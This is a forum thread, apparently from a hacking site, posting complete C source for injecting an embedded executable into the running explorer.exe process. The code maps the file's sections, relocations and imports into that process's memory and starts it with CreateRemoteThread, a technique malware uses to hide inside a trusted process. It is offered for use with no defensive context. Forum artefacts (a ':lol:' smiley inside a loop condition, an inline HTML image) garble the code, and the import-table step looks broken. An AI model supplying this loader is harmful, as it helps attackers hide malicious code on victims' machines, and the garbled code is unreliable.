Thread: Inject ExE in Running Process

Code:

//Press Thanks to USDL :)
//Press Thanks to USDL :)
//Press Thanks to USDL :)

#pragma comment (linker,"/NODEFAULTLIB")
#pragma comment (linker,"/ENTRY:main")

#include <windows.h>
#include <Tlhelp32.h>
#include "resource.h"

int main()
{
 PIMAGE_DOS_HEADER IDH;
 PIMAGE_NT_HEADERS INTH;
 PIMAGE_SECTION_HEADER ISH;

 //Lets load the resource
 HRSRC hResource=FindResourceA(NULL,(LPCSTR)MAKEINTRESOURCE(IDR_EXE1),"EXE");
 DWORD ResourceSize=SizeofResource(NULL,hResource);
 HGLOBAL hGlob=LoadResource(NULL,hResource);
 LPSTR lpFileMaped=(LPSTR)LockResource(hGlob);

 //obtain the DOS and PE headers
 IDH=(PIMAGE_DOS_HEADER)&lpFileMaped[0];
 INTH=(PIMAGE_NT_HEADERS)&lpFileMaped[IDH->e_lfanew];

 DWORD PID=0;
 HANDLE hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
 PROCESSENTRY32 pInfo;
 pInfo.dwSize=sizeof(PROCESSENTRY32);

 //obtain explorer.exe's PID
 Process32First(hSnapshot,&pInfo);
 for(;lstrcmpA(pInfo.szExeFile,"explorer.exe"):lol:
 {
 Process32Next(hSnapshot,&pInfo);
 }
 CloseHandle(hSnapshot);
 PID=pInfo.th32ProcessID;

 //Open the process we will inject to
 HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,PID);

 //Create a buffer the size of "SizeOfImage", which we will load into the executable
 LPSTR ExeBuffer=(LPSTR)VirtualAllocEx(hProcess,0,INTH->OptionalHeader.SizeOfImage,MEM_RESERVE|MEM_COMMIT,PAGE_EXECUTE_READWRITE);

 //Copy the PE and DOS Header to the Buffer
 WriteProcessMemory(hProcess,&ExeBuffer[0],&lpFileMaped[0],INTH->OptionalHeader.SizeOfHeaders,0);

 //Copy the sections VirtualOffsets into the buffer
 for(DWORD i=0;i<INTH->FileHeader.NumberOfSections;i++)
 {
 ISH=(PIMAGE_SECTION_HEADER)&lpFileMaped[IDH->e_lfanew+sizeof(IMAGE_NT_HEADERS)+sizeof(IMAGE_SECTION_HEADER)*i];
 WriteProcessMemory(hProcess,&ExeBuffer[ISH->VirtualAddress],&lpFileMaped[ISH->PointerToRawData],ISH->SizeOfRawData,0);
 }
 //Calculate the Delta from the address of the buffer and the ImageBase
 DWORD Delta=(((DWORD)ExeBuffer)-INTH->OptionalHeader.ImageBase);

 //------------------------------------------------------------
 /* -Relocate the reloc base in the executable <img src="http://zero.serhackernoesilegal.com/wp-includes/images/smilies/icon_biggrin.gif" alt=":D" class="wp-smiley"> - */
 //------------------------------------------------------------

 //If there isn't a relocationbase then we leave
 if(INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size==0)
 {
 MessageBoxA(0,"No hay relocation table!",0,0);
 return false;
 }

 //Get the ImageBase Relocation
 //Copy the ImageBase Relocation  of the data from the process into a buffer
 //to work more comfortably
 PIMAGE_BASE_RELOCATION IBR=(PIMAGE_BASE_RELOCATION)GlobalAlloc(GPTR,sizeof(IMAGE_BASE_RELOCATION));
 PIMAGE_BASE_RELOCATION PIBR=(PIMAGE_BASE_RELOCATION)(ExeBuffer+INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
 ReadProcessMemory(hProcess,(LPVOID)PIBR,IBR,sizeof(IMAGE_BASE_RELOCATION),0);
 
 //Loop through all the entries
 for (DWORD n=0;IBR->VirtualAddress>0;n++)
 {
 //Obtain the RelocationBlock
 LPSTR RelocationBlock=(LPSTR)(ExeBuffer+IBR->VirtualAddress);

 //Obtain the first entry in the block
 LPWORD RelocationEntry=(LPWORD)((LPSTR)PIBR+sizeof(IMAGE_BASE_RELOCATION));

 //loop through all the entries
 for (DWORD i=0;i<((IBR->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))/2);i++,RelocationEntry++)
 {
 WORD valor;
 ReadProcessMemory(hProcess,RelocationEntry,&valor,2,0);
 //Get the 4 bytes that define the type of relocation
 DWORD type=valor>>12;

 //Get the 12 bytes that define the address of the Relocation
 DWORD offset=valor&0xFFF;

 //If the type of relocation is relative to the baseaddress, we add the delta to it
 if(type==IMAGE_REL_BASED_HIGHLOW)
 {
 //Add the address which depends on the original imagebase
 //from the delta with the imagebase and our base address
 LPDWORD newAddr=(LPDWORD)(RelocationBlock+offset);
 DWORD NewValue;
 ReadProcessMemory(hProcess,newAddr,&NewValue,4,0);
 NewValue+=Delta;
 WriteProcessMemory(hProcess,newAddr,&NewValue,4,0);
 }
 }

 //Loop to the next block
 PIBR=(PIMAGE_BASE_RELOCATION)(((DWORD)PIBR)+IBR->SizeOfBlock);
 ReadProcessMemory(hProcess,(LPVOID)PIBR,IBR,sizeof(IMAGE_BASE_RELOCATION),0);
 }
 GlobalFree(IBR);

 //---------------------------------------------------------------------
 /* -Load the values from the IAT to call the APIs-               */
 //---------------------------------------------------------------------

 PIMAGE_THUNK_DATA ITD;
 PIMAGE_THUNK_DATA PITD;
 PIMAGE_IMPORT_BY_NAME IIBN;

 //Check if there is an Import Data Descriptor
 if (INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size>0)
 {

 //Obtain the Import Data Descriptor
 //Copy the Import Data Descriptor from the data in the process to a buffer to work with 
 PIMAGE_IMPORT_DESCRIPTOR IID=(PIMAGE_IMPORT_DESCRIPTOR)GlobalAlloc(GPTR,sizeof(IMAGE_IMPORT_DESCRIPTOR));
 PIMAGE_IMPORT_DESCRIPTOR PIID=(PIMAGE_IMPORT_DESCRIPTOR)(ExeBuffer+INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
 ReadProcessMemory(hProcess,(LPVOID)PIID,IID,sizeof(IMAGE_IMPORT_DESCRIPTOR),0);

 //Loop through all the imported Dlls by the executable
 for (;IID->Name;)
 {
 //Obtain the address of the dllname
 DWORD szName=0;
 CHAR miByte=1;
 for(int i=0;miByte;i++)
 {
 szName=i;
 ReadProcessMemory(hProcess,ExeBuffer+IID->Name+i,&miByte,1,0);
 }

 //Get the dll name
 LPSTR lpName=(LPSTR)GlobalAlloc(GPTR,szName+1);
 ReadProcessMemory(hProcess,ExeBuffer+IID->Name,lpName,szName+1,0);

 //Load the Dll
 HMODULE hLib=LoadLibraryA(lpName);

 //Get the address of the first member from Image Thunk Data's array
 PITD=(PIMAGE_THUNK_DATA)((DWORD)ExeBuffer+IID->FirstThunk);
 ITD=(PIMAGE_THUNK_DATA)GlobalAlloc(GPTR,sizeof(IMAGE_THUNK_DATA));
 ReadProcessMemory(hProcess,PITD,ITD,sizeof(IMAGE_THUNK_DATA),0);

 //Loop through all the API imports
 for (;ITD->u1.Ordinal;)
 {
 miByte=1;
 //Obtain the address of the API name
 for(int i=0;miByte;i++)
 {
 szName=i;
 LPSTR puntero=ExeBuffer+ITD->u1.Function+2;
 puntero+=i;
 ReadProcessMemory(hProcess,puntero,&miByte,1,0);
 }

 //Load the Image Import By Name to get the name
 IIBN=(PIMAGE_IMPORT_BY_NAME)GlobalAlloc(GPTR,sizeof(IMAGE_IMPORT_BY_NAME)+szName);
 ReadProcessMemory(hProcess,ExeBuffer+ITD->u1.Function,IIBN,sizeof(IMAGE_IMPORT_BY_NAME)+szName,0);

 //Get the address of the function and save it in the IAT
 DWORD lpAPI=(DWORD)GetProcAddress(hLib,(LPCSTR)&IIBN->Name);
 //WriteProcessMemory(hProcess,ExeBuffer+IID->FirstThunk,&lpAPI,4,0); /* Error HERE!*/
                WriteProcessMemory(hProcess,ExeBuffer+ITD->u1.Function,&lpAPI,4,0);/* Error FIXED!*/

 PITD++;
 ReadProcessMemory(hProcess,PITD,ITD,sizeof(IMAGE_THUNK_DATA),0);
 }
 PIID++;
 ReadProcessMemory(hProcess,(LPVOID)PIID,IID,sizeof(IMAGE_IMPORT_DESCRIPTOR),0);
 GlobalFree(lpName);
 GlobalFree(ITD);
 }
 GlobalFree(IID);
 }

 //Obtain the entry point of the executable that we loaded in the buffer
 DWORD EntryPoint=((DWORD)ExeBuffer)+INTH->OptionalHeader.AddressOfEntryPoint;

 //Call the entrypoint
 CreateRemoteThread(hProcess,0,0,(LPTHREAD_START_ROUTINE)EntryPoint,0,0,0);

 return 0;
}

Press Thanks